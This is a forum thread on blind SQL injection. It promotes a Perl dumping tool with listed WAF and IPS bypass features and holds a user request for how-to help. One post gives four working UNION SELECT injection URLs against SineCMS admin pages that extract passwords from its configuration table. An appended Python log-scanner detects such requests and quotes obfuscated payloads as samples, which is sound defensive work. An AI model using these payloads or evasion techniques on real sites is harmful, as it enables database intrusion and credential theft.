Posted

Blind SQL injection is identical to normal SQL injection except that when an attacker attempts to exploit an application, rather than getting a useful error message they get a generic page specified by the developer instead. This makes exploiting a potential SQL injection attack more difficult but not impossible. An attacker can still steal data by asking a series of True and False questions through SQL statements.

Information provided by Infobyte

SR-sqlget: It's a blind SQL injection tool developed in Perl. It lets you get database schemas and table rows. Using a single GET/POST you can quietly access the database structure, and using a single GET/POST you can dump every table row to a CSV-like file.

Databases supported:

- IBM DB2

- Microsoft SQL Server

- Oracle

- Postgres

- MySQL

- IBM Informix

- Sybase

- Hsqldb (www.hsqldb.org)

- Mimer (www.mimer.com)

- Pervasive (www.pervasive.com)

- Virtuoso (virtuoso.openlinksw.com)

- SQLite

- Interbase/Yaffil/Firebird (Borland)

- H2 (http://www.h2database.com)

- Mckoi (http://mckoi.com/database/)

- Ingres (http://www.ingres.com)

- MonetDB (http://www.monetdb.nl)

- MaxDB (www.mysql.com/products/maxdb/)

- ThinkSQL (http://www.thinksql.co.uk/)

- SQLBase (http://www.unify.com)

 

Evasion features:

- Full-width/Half-width Unicode encoding

- Apache non standard CR bypass

- mod_security bypass

- Random uppercase request transform

- PHP Magicquotes: encode every string using db CHR function or similar.

- Convert requests to hexadecimal values

- Avoid non-space replacing for /**/ or (\t) tab

- Avoid non || or + concatenation using db concat function or similar.

- Random user-agent

- Random proxy-server

- Random delay request

 

Common features:

- Database schemata download blacklist

- Cookie array support

- SSL support

- Proxy server support

- Database information dumped in csv format

 

Reporting:

- Database structure graphing to create impact executive reports; requires the Graphviz library (http://www.graphviz.org/)

Demo:

- Demo features (bypassing IBM ISS Proventia IPS) - http://www.infobyte.com.ar/demo/ISR_sqlget_ISS_proventia_bypass.html

 

 

  • 3 months later...
Posted

Hmm, sorry for posting in quite an old post... But I think it's the appropriate place to ask this:

I don't know anything about MySQL injections, so I want to know how it's done... How can I insert or read data from a database with an injection... Info plix, thnx :D

  • 3 weeks later...
Posted

http://[target]/[sinecms_path]/admin/mods_adm.php?mods=Guestbook&action=modifica&id='+union+select+1,2,3,4,password,6+from+sine_configuration/*

http://[target]/[sinecms_path]/admin/mods_adm.php?mods=Calendar&mese=11'+union+select+1,password,3,4,5,6,7,8,9+from+sine_configuration/*

http://[target]/[sinecms_path]/admin/mods_adm.php?mods=Calendar&action=modify&id='+union+select+1,2,3,4,password,6,7,8,9+from+sine_configuration/*

http://[target]/[sinecms_path]/admin/mods_adm.php?mods=Calendar&anno='+union+select+1,password,3,4,5,6,7,8,9+from+sine_configuration/*
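
A defender-side way to spot the request pattern in the URLs posted above when reviewing web-server access logs, after undoing several of the cosmetic evasions from the tool's feature list (random uppercase, /**/ or tab in place of spaces, full-width Unicode). This is an added example, not part of any post in this thread; the log lines, the `/cms/` path and the function names are constructed for illustration.

```python
import re
import unicodedata
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines (addresses, paths and values are made up).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET /cms/admin/mods_adm.php'
    '?mods=Calendar&mese=11 HTTP/1.1" 200 512',
    '203.0.113.9 - - [01/Jan/2024:10:00:01 +0000] "GET /cms/admin/mods_adm.php'
    '?mods=Calendar&anno=%27+UnIoN/**/sElEcT+1,password,3+from+sine_configuration/*'
    ' HTTP/1.1" 200 498',
    '203.0.113.9 - - [01/Jan/2024:10:00:07 +0000] "GET /cms/admin/mods_adm.php'
    '?mods=Guestbook&id=%27%09%EF%BD%95%EF%BD%8E%EF%BD%89%EF%BD%8F%EF%BD%8E'
    '%09select%091,2+from+sine_configuration/* HTTP/1.1" 200 498',
    '198.51.100.4 - - [01/Jan/2024:10:01:00 +0000] "GET /search.php'
    '?q=credit+union+hours HTTP/1.1" 200 900',
]

REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
UNION_SELECT = re.compile(r"\bunion\s+(?:all\s+)?select\b")

def normalize(value):
    """Fold the cosmetic transforms back to one canonical spelling."""
    value = unicodedata.normalize("NFKC", value)            # full-width -> ASCII
    value = re.sub(r"/\*.*?\*/", " ", value, flags=re.S)    # /**/ used as a space
    return re.sub(r"\s+", " ", value).lower()               # tab/CR, random case

def suspicious_params(log_line):
    """Return (parameter, rule) pairs for one access-log line."""
    match = REQUEST.search(log_line)
    if not match:
        return []
    hits = []
    query = urlsplit(match.group(1)).query
    for name, raw in parse_qsl(query, keep_blank_values=True):  # URL-decodes
        text = normalize(raw)
        if UNION_SELECT.search(text):
            hits.append((name, "union-select"))
        if text.rstrip().endswith("/*"):     # comment opened but never closed
            hits.append((name, "open-comment"))
    return hits

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(suspicious_params(line) or "clean", "<-", line.split('"')[1][:60])
```

Hex- or CHR()-encoded values are not normalised here, so this works as a triage filter over logs and not as a replacement for parameterised queries in the application.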
